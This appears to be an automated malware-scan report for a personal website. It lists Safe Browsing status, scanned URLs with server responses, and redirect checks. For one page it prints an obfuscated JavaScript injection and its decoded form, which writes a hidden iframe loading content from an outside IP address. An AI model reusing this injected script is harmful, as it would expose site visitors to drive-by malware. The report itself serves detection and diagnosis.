Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kristin.chiboucas.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://kristin.chiboucas.net/ | HTTP/1.1 200 OK Date: Tue, 06 Jan 2015 18:37:01 GMT Accept-Ranges: bytes ETag: "a09ce22220cfca1:10a71e" Server: Microsoft-IIS/6.0 Content-Length: 947 Content-Location: http://kristin.chiboucas.net/Index.htm Content-Type: text/html Last-Modified: Mon, 29 Mar 2010 09:13:46 GMT X-Powered-By: PleskWin X-Powered-By: ASP.NET | clean |
http://kristin.chiboucas.net/index.htm | 200 OK Content-Length: 947 Content-Type: text/html | clean |
http://kristin.chiboucas.net/photo.html | 200 OK Content-Length: 11031 Content-Type: text/html | clean |
http://kristin.chiboucas.net/index.html | 404 Not Found Content-Length: 6533 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function c1860826474n48ec9ba77d6c0(n48ec9ba77dabe){ function n48ec9ba77deb3(){var n48ec9ba77e2aa=16;return n48ec9ba77e2aa;} return (parseInt(n48ec9ba77dabe,n48ec9ba77deb3()));}function n48ec9ba77e6a2(n48ec9ba77ea99){ var n48ec9ba77ee91='';n48ec9ba77fe72=String.fromCharCode;for(n48ec9ba77f288=0;n48ec9ba77f288<n48ec9ba77ea99.length;n48ec9ba77f288+=2){ n48ec9ba77ee91+=(n48ec9ba77fe72(c1860826474n48ec9ba77d6c0(n48ec9ba77ea99.substr(n48ec9ba77f288,2))));}return n48ec9ba77ee91;} var xba='';var n48 Decoded script: function check_content(){var i=0;while(document.getElementsByTagName('iframe').length){var el=document.getElementsByTagName('iframe')[i];if( (el.style.display=='none' || el.style.visibility =='hidden' || (el.width<5 && el.height<5)) && el.name!='c1'){el.parentNode.removeChild(el);}else i++;}}check_content(); if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%32%30%39%2e%31%36%30%2e%32%33%2e%31%30%34%2f%6c%73%2f%3f%74%3d%32%39&%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%34%35%35%32%30%29%2b%27%34%63%35%65%31%64%31%27%20%77%69%64%74%68%3d%34%39%36%20%68%65%69%67%68%74%3d%34%39%35%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true; Antivirus reports:
| ||
http://google-analytics.us/q/urchin.js | 404 Not Found Content-Length: 470 Content-Type: text/html | clean |
http://google-analytics.us/test404page.js | 404 Not Found Content-Length: 473 Content-Type: text/html | clean |
http://analytics-google.info/i/urchin.js | 200 OK Content-Length: 50 Content-Type: text/html | clean |
http://kristin.chiboucas.net/obama.htm | 200 OK Content-Length: 49891 Content-Type: text/html | clean |
http://kristin.chiboucas.net/obamaInaug1.htm | 200 OK Content-Length: 4978 Content-Type: text/html | clean |
http://kristin.chiboucas.net/obamaInaug2.htm | 200 OK Content-Length: 5745 Content-Type: text/html | clean |
http://kristin.chiboucas.net/obama/VORC001.wav | 200 OK Content-Length: 301624 Content-Type: audio/wav | clean |
http://kristin.chiboucas.net/obama/VORC003.wav | 200 OK Content-Length: 303073 Content-Type: audio/wav | clean |
http://kristin.chiboucas.net/obama/VORC005.wav | 200 OK Content-Length: 300959 Content-Type: audio/wav | clean |
http://kristin.chiboucas.net/obama/GarthrockinObama.wmv | 200 OK Content-Length: 277786 Content-Type: video/x-ms-wmv | clean |
http://kristin.chiboucas.net/obamaInaug3.htm | 200 OK Content-Length: 3576 Content-Type: text/html | clean |
http://kristin.chiboucas.net/obamaInaug4.htm | 200 OK Content-Length: 6166 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kristin.chiboucas.net
Result:
HTTP/1.1 200 OK
Date: Tue, 06 Jan 2015 18:37:01 GMT
Accept-Ranges: bytes
ETag: "a09ce22220cfca1:10a71e"
Server: Microsoft-IIS/6.0
Content-Length: 947
Content-Location: http://kristin.chiboucas.net/Index.htm
Content-Type: text/html
Last-Modified: Mon, 29 Mar 2010 09:13:46 GMT
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
...947 bytes of data.
GET / HTTP/1.1
Host: kristin.chiboucas.net
Result:
HTTP/1.1 200 OK
Date: Tue, 06 Jan 2015 18:37:01 GMT
Accept-Ranges: bytes
ETag: "a09ce22220cfca1:10a71e"
Server: Microsoft-IIS/6.0
Content-Length: 947
Content-Location: http://kristin.chiboucas.net/Index.htm
Content-Type: text/html
Last-Modified: Mon, 29 Mar 2010 09:13:46 GMT
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
...947 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: kristin.chiboucas.net
Referer: http://www.google.com/search?q=kristin.chiboucas.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kristin.chiboucas.net
Referer: http://www.google.com/search?q=kristin.chiboucas.net
Result:
The result is similar to the first query. There are no suspicious redirects found.